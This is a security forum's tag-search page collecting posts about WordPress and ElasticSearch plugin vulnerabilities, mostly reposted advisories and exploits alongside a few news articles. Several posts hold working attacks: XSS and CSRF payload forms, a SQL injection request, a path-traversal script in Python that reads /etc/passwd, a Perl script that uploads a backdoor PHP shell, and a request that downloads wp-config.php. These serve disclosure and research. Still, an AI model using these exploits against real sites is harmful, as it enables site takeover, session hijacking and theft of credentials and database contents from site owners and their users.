Jump to content

Search the Community

Showing results for tags 'plugin'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 22 results

  1. Salut, Am un plugin de wp pe care as dori sa-l modifc/updatez, caut o persoana capabila sa se ocupe cu dezvoltare pe partea de wordpress/woocommerce. cx.dany [@] yahoo.com Multumesc.
  2. Advisory ID: HTB23257 Product: WP Photo Album Plus WordPress Plugin Vendor: J.N. Breetvelt Vulnerable Version(s): 6.1.2 and probably prior Tested Version: 6.1.2 Advisory Publication: April 29, 2015 [without technical details] Vendor Notification: April 29, 2015 Vendor Patch: April 29, 2015 Public Disclosure: May 20, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3647 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website. The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface. A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images: <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main"> <input type="hidden" name="action" value='wppa'> <input type="hidden" name="wppa-action" value='do-comment'> <input type="hidden" name="photo-id" value='2'> <input type="hidden" name="comment" value='1'> <input type="hidden" name="moccur" value='1'> <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="submit" id="btn"> </form> The code will be automatically executed, when the administrator visits one of the following pages: http://[host]/wp-admin/admin.php?page=wppa_manage_comments http://[host]/wp-admin/admin.php?page=wppa_moderate_photos ----------------------------------------------------------------------------------------------- Solution: Update to WP Photo Album Plus 6.1.3 More Information: https://wordpress.org/plugins/wp-photo-album-plus/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin. [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
  3. ================================================================ CSRF/Stored XSS Vulnerability in Ad Buttons Plugin ================================================================ . contents:: Table Of Content Overview ======== * Title :CSRF and Stored XSS Vulnerability in Ad Buttons Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ad-buttons/ * Severity: HIGH * Version Affected: Version 2.3.1 and mostly prior to it * Version Tested : Version 2.3.1 * version patched: Description =========== Vulnerable Parameter -------------------- * Your Ad Here' url About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin 1. Goto Dashboard --> Ad button --> Setting 2. Insert this payload ## ">><script>+-+-1-+-+alert(document.cookie)</script> ## Into above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Ad Button settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below CSRF POC Code ============= <html> <body> <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=ad-buttons-settings" method="POST"> <input type="hidden" name="ab_dspcnt" value="1" /> <input type="hidden" name="ab_title" value="" /> <input type="hidden" name="ab_target" value="bnk" /> <input type="hidden" name="ab_powered" value="1" /> <input type="hidden" name="ab_count" value="1" /> <input type="hidden" name="ab_yaht" value="pag" /> <input type="hidden" name="ab_yourad" value="44" /> <input type="hidden" name="ab_yahurl" value="">><script>+-+-1-+-+alert(6)</script>" /> <input type="hidden" name="ab_adsense_fixed" value="1" /> <input type="hidden" name="ab_adsense_pos" value="1" /> <input type="hidden" name="ab_adsense_pubid" value="pub-" /> <input type="hidden" name="ab_adsense_channel" value="" /> <input type="hidden" name="ab_adsense_corners" value="rc:0" /> <input type="hidden" name="ab_adsense_col_border" value="#" /> <input type="hidden" name="ab_adsense_col_title" value="#" /> <input type="hidden" name="ab_adsense_col_bg" value="#" /> <input type="hidden" name="ab_adsense_col_txt" value="#" /> <input type="hidden" name="ab_adsense_col_url" value="#" /> <input type="hidden" name="ab_width" value="<img" /> <input type="hidden" name="ab_padding" value="<img" /> <input type="hidden" name="Submit" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Plugin Closed Change Log ========== Plugin Closed Disclosure ========== 18-April-2015 Reported to Developer Plugin Closed 8-May-2015 Public credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh (at) me (dot) com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  4. #!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @digitalsec.net # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ import socket, sys print "!dSR ElasticPwn - for CVE-2015-3337\n" if len(sys.argv) <> 3: print "Ex: %s [url]www.example.com[/url] /etc/passwd" % sys.argv[0] sys.exit() port = 9200 # Default ES http port host = sys.argv[1] fpath = sys.argv[2] def grab(plugin): socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(2048) print " [*] Trying to retrieve "+str(fpath)+":" if ("HTTP/1.0 200 OK" in file): print "\n"+file else: print "[-] File Not Found or system not vulnerable" def pfind(plugin): try: socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(16) print "[*] Trying to find plugin "+plugin+":" if ("HTTP/1.0 200 OK" in file): print "[+] Plugin found!" grab(plugin) sys.exit() else: print "[-] Not Found " except Exception, e: print "[-] Error connecting to "+host+" "+str(e) sys.exit() # Include more plugin names to check if they are installed pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] for plugin in pluginList: pfind(plugin) Source
  5. Advisory ID: HTB23255 Product: eShop WordPress plugin Vendor: Rich Pedley Vulnerable Version(s): 6.3.11 and probably prior Tested Version: 6.3.11 Advisory Publication: April 15, 2015 [without technical details] Vendor Notification: April 15, 2015 Public Disclosure: May 6, 2015 Vulnerability Type: Code Injection [CWE-94] CVE Reference: CVE-2015-3421 Risk Level: Medium CVSSv2 Base Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered security vulnerability in eShop WordPress Plugin, which can be exploited by remote attacker to overwrite arbitrary PHP variables within the context of the vulnerable application. The vulnerability exists due to insufficient validation of user-supplied input in "eshopcart" HTTP cookie. Successful exploitation of this vulnerability may potentially result in arbitrary PHP code execution (RCE). Often such type of vulnerabilities lead to RCE, however in this case we can only overwrite string variables within the scope of 'eshop_checkout()' function in '/wp-content/plugins/eshop/checkout.php' file. This reduces our current vectors of exploitation to Full Path Disclosure and Cross-Site Scripting. Below is a simple PoC that overwrites contents of the "wpdb" PHP variable, which causes an error in code and discloses full installation path: GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=wpdb%3d1%7C; Another PoC triggers the XSS vector and executes JS pop-up box displaying "ImmuniWeb": GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=phone%3dsdfg'"><script>alert(/ImmuniWeb/)</script> ----------------------------------------------------------------------------------------------- Solution: Disclosure timeline: 2015-04-15 Vendor Alerted via contact form and thread in support forum, no reply. 2015-04-29 Vendor Alerted via contact form and emails, no reply. 2015-05-05 Fix Requested via contact form and emails, no reply. 2015-05-06 Public disclosure. Currently we are not aware of any official solution for this vulnerability. ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23255 - https://www.htbridge.com/advisory/HTB23255 - Arbitrary Variable Overwrite in eShop WordPress Plugin. [2] eShop WordPress Plugin - http://quirm.net/ - eShop is an accessible shopping cart plugin for WordPress, packed with various features. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
  6. Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin Author: Rohit Kumar Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/ Severity: Medium Version Affected: Version 1.215 and mostly prior to it. Version Tested: Version 1.215 Version Patched : 1.215 Description: Vulnerable Parameter 1. App ID 2. App Secret 3. Custom Picture URL 4. Default Picture URL 5. URL News Feed Icon About Vulnerability This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user accessed to Add Link to Facebook Settings in Wordpress with Administrator privileges. A malicious administrator can hijack other users sessions, take control of another administrators browser or install malware on their computer. Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) Steps to Reproduce: After installing the plugin: Goto Settings All in One Facebook Input this payload in App ID :- ><script>alert(1)</script> Click on the Save button. After reloading the page you will see a Pop Up Box with 1 written on it. Reload the page again to make sure its stored. Change Log https://wordpress.org/plugins/add-link-to-facebook/changelog/ Disclosure 09th March 2015 Source: http://packetstorm.wowhacker.com/1504-advisories/wpfacebook-xss.txt
  7. ======================================================================= title: SQL Injection product: WordPress Tune Library Plugin vulnerable version: 1.5.4 (and probably below) fixed version: 1.5.5 CVE number: CVE-2015-3314 impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/tune-library/ found: 2015-01-09 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site." Source: [url]https://wordpress.org/plugins/tune-library/[/url] Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a sql injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability: 1) The wordpress security feature wp_magic_quotes(), which is enabled by default, has to be disabled. 2) The plugin specific option "Filter artists by letter and show alphabetical navigation" has to be enabled. Proof of concept: ----------------- The following HTTP request to the Tune Library page returns version, current user and db name: =============================================================================== [url]http://www.site.com/?page_id=2&artistletter=G[/url]' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 =============================================================================== Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-09: Author replies and announces a fix within a week. 2015-04-12: Mail from author, stating that plugin has been updated. 2015-04-14: Requesting CVE via post to the open source software security mailing list: [url]http://openwall.com/lists/oss-security/2015/04/14/5[/url] 2015-04-20: Release of security advisory. Solution: --------- Update to the most recent plugin version. Workaround: ----------- Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by letter..." option. Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt
  8. ################################################################################################## #Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility #Author : Manish Kishan Tanwar AKA error1046 #Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ #Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip #Date : 9/04/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server and hence vulnerable to arbitrary file upload //////////////// /// POC //// /////////////// Uploading PHP shell ================================= Just open uploader.php in plugin directory Access Denied browse your php shell and submit it. after uploading, you will get your shell in uploads directory at following location http://target.com/wp-content/uploads/i-dump-uploads/ demo:- 404 Not Found and upload your shell --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source: http://packetstorm.wowhacker.com/1504-exploits/wpwdippu-upload.txt
  9. Download WPML Multilingual Plugin makes it easy to run a multilingual website with a single WordPress install. Choose languages for your site and start translating content. The default install comes with over 40 languages. You can also add your own language variants (like Canadian French or Mexican Spanish) using WPMLs languages editor.
  10. Slider Pro is mostly a perfectly responsive plus press–empowered Wp slider plugin that will allows you to make expert and sophisticated sliders. This particular slider wordpress extension was in fact built utilizing user expertise in thoughts, determined to provide a clear and easy-to-use user interface within the administration area and also a soft nav expertise for the users. Download
  11. ###################################################################### # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload # Google Dork: inurl:/plugins/php-event-calendar/ # Date: 02.04.2015 # Exploit Author: CrashBandicot (@DosPerl) # Source Plugin: https://wordpress.org/plugins/php-event-calendar/ # Vendor HomePage: http://phpeventcalendar.com/ # Version: 1.5 # Tested on: MSwin ###################################################################### # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php # Vulnerable File : uploadify.php <?php /* Uploadify Copyright (c) 2012 Reactive Apps, Ronnie Garcia Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ // Define a destination //$targetFolder = '/uploads'; // Relative to the root $targetFolder = $_POST['targetFolder']; // wp upload directory $dir = str_replace('\\','/',dirname(__FILE__)); //$verifyToken = md5('unique_salt' . $_POST['timestamp']); if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; //$targetPath = $dir.$targetFolder; $targetPath = $targetFolder; $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name']; $targetFile = rtrim($targetPath,'/') . '/' . $fileName; // Validate the file type $fileTypes = array('jpg','jpeg','gif','png'); // File extensions $fileParts = pathinfo($_FILES['Filedata']['name']); if (in_array($fileParts['extension'],$fileTypes)) { move_uploaded_file($tempFile,$targetFile); echo '1'; } else { echo 'Invalid file type.'; } } ?> # Exploit #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\t +===================================================\n"; print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n"; print "\t | Author: CrashBandicot\n"; print "\t +===================================================\n\n"; die "usage : perl $0 backdoor.php.gif" unless $ARGV[0]; $file = $ARGV[0]; my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content; if($ch = ~/1/) { print "\n [+] File Uploaded !"; } else { print "\n [-] Target not Vuln"; } __END__ # Path Shell : http://localhost/0day_backdoor.php.gif Source
  12. =============================================================================== CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/ * Severity: HIGH * Version Affected: Version 3.4 and mostly prior to it * Version Tested : Version 3.4 * version patched: 4.0 * CVE ID : CVE-2015-2755 Description =========== Vulnerable Parameter -------------------- * Latitude: * Longitude: * Map Width: * Map Height: * Map Zoom: * And all Input Boxes About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin After installing the plugin 1. Goto settings -> Google Map Travel 2. Insert this payload ## "> <script>+-+-1-+-+alert(document.cookie)</script> ## Into Any above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Google Map Travel settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST"> <input type="hidden" name="lat" value=""> <script>+-+-1-+-+alert(document.cookie)</script>" /> <input type="hidden" name="long" value="76.26730" /> <input type="hidden" name="lang" value="en" /> <input type="hidden" name="map_width" value="500" /> <input type="hidden" name="map_height" value="300" /> <input type="hidden" name="zoom" value="7" /> <input type="hidden" name="day_less_five_fare" value="llllll" /> <input type="hidden" name="day_more_five_fare" value="1.5" /> <input type="hidden" name="less_five_fare" value="3" /> <input type="hidden" name="more_five_fare" value="2.5" /> <input type="hidden" name="curr_format" value="$" /> <input type="hidden" name="submit" value="Update Settings" /> <input type="submit" value="Submit request" /> </form> </body> </html> . image:: csrf.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Update to version 4.0 Change Log ========== https://wordpress.org/plugins/ab-google-map-travel/changelog/ Disclosure ========== 07-March-2015 Reported to Developer 11-March-2015 Reported to Wordpress 11-March-2015 Acknowledgement from Developer 16-March-2015 Wordpress reviwed and publish the updated plugin. 16-March-2015 Requested for CVE ID 27-March-2015 CVE Assign 28-March-2015 Reposted with CVE ID credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source: http://dl.packetstormsecurity.net/1503-exploits/wpabgmt-xssxsrf.txt
  13. # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Link : Premium plugin # Dork Google: revslider.php "index of" # Date : 2014-07-24 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability ###################### # PoC http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source
  14. Yoast has released a new version of its popular Google Analytics plugin for WordPress to address a persistent cross-site scripting (XSS) vulnerability that could have been exploited to execute arbitrary code. Google Analytics by Yoast has been downloaded nearly 7 million times. The application allows WordPress administrators to monitor website traffic by connecting the plugin to their Google Analytics account. The vulnerability was identified by Jouko Pynnonen, the CEO of Finland-based IT company Klikki Oy. Earlier this month, the expert reported identifying several vulnerabilities in the WPML premium WordPress plugin. According to the researcher, an attacker can leverage a flaw in Google Analytics by Yoast to store arbitrary code in a targeted administrator’s WordPress dashboard. The code is executed as soon as the administrator opens the plugin’s settings panel. The attack involves two security bugs. First, there is an access control flaw that allows an unauthenticated attacker to connect the plugin installed on the targeted website to his own Google Analytics account by overwriting existing OAuth2 credentials. The second stage of the attack relies on the fact that the plugin renders an HTML dropdown menu based on data from Google Analytics. Because this data is not sanitized, an attacker can enter malicious code in the Google Analytics account and it gets executed when the targeted administrator views the plugin’s settings panel. “Under default WordPress configuration, a malicious user can exploit this flaw to execute arbitrary server-side PHP code via the plugin or theme editors,” Pynnonen said in an advisory. “Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target site.” The security issues have been addressed with the release of Google Analytics by Yoast version 5.3.3. The update also fixes a flaw that allowed administrators to launch XSS attacks against other administrators. This vulnerability was publicly disclosed back in February by Kaustubh G. Padwad and Rohit Kumar. This isn’t the first time someone finds a vulnerability in a plugin from Yoast. Last week, UK-based researcher Ryan Dewhurst uncovered a blind SQL injection vulnerability in WordPress SEO by Yoast. Sursa: securityweek.com
  15. Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin . contents:: Table Of Content Overview Title :Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin Author: Kaustubh G. Padwad, Rohit Kumar. Plugin Homepage: https://yoast.com/wordpress/plugins/google-analytics/ Severity: Medium Version Affected: Version 5.3.2 and mostly prior to it Version Tested : Version 5.3.2 version patched: Description Vulnerable Parameter Current UA-Profile Manually enter your UA code Label for those links Set path for internal links to track as outbound links: Subdomain tracking: Extensions of files to track as downloads: About Vulnerability This plugin is vulnerable to a Stored Cross Site Scripting vulnerability,This issue was exploited when administrator users with access to "Google Analytics by Yoast" Setting in wordpress above listed vulnerable parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer. Vulnerability Class Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) After installing the plugin Goto settings --> Google Analytics by Yoast Input this payload in "Manually enter your UA code" :- v style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x Click on the Save Changes button and navigate your cursor to input box,you will see XSS in action Reload the page or re navigate to page to make sure its stored Mitigation https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits Change Log https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits Disclosure 22-February-2015 Reported to developer 25-February-2015 Fixed by developer 05-March-2015 Issue Closed with team. 06-March-2015 Public Discloser credits Kaustubh Padwad & Rohit Kumar Information Security Researcher kingkaustubh@me.com & kumarrohit2255@gmail.com @s3curityb3ast,@rkumars3c [url]http://breakthesec.com[/url] [url]https://www.linkedin.com/in/kaustubhpadwad[/url] Source
  16. More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting critical vulnerability in most versions of a plugin called WP-Slimstat. Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites. "If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)." The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database. WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately. Post updated to change headline. It previously read: More than1 million WordPress websites imperiled by critical plugin bug. Source
  17. ===================================================== Stored XSS Vulnerability in ADPlugg Wordpress Plugin ===================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in ADPlugg Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/adplugg/ * Severity: Medium * Version Affected: 1.1.33 and mostly prior to it * Version Tested : 1.1.33 * version patched: 1.1.34 Description =========== Vulnerable Parameter -------------------- * Access Code About Vulnerability ------------------- This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to AdPlugg Setting in wordpress Access code parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer. Vulnerability Class =================== Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin * Goto settings --> AdPlugg * Put This payload in Access Code "><script>alert(document.cookie)</script> * Click on the Save Changes you will see XSS in action * Reload the page or re navigate to page to make sure its stored Mitigation ========== Update to Version 1.1.34 Change Log ========== https://wordpress.org/plugins/adplugg/changelog/ Disclosure ========== 18-February-2015 reported to developer 19-February-2015 Developer acknodlage the Bug 19-February-2015 Developer Patched the Bug and Push update 21-February-2015 Public Discloser credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  18. WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server. In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin. So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure. In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are WordPress user, you can use this tool to find vulnerabilities in your website and patch. In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really 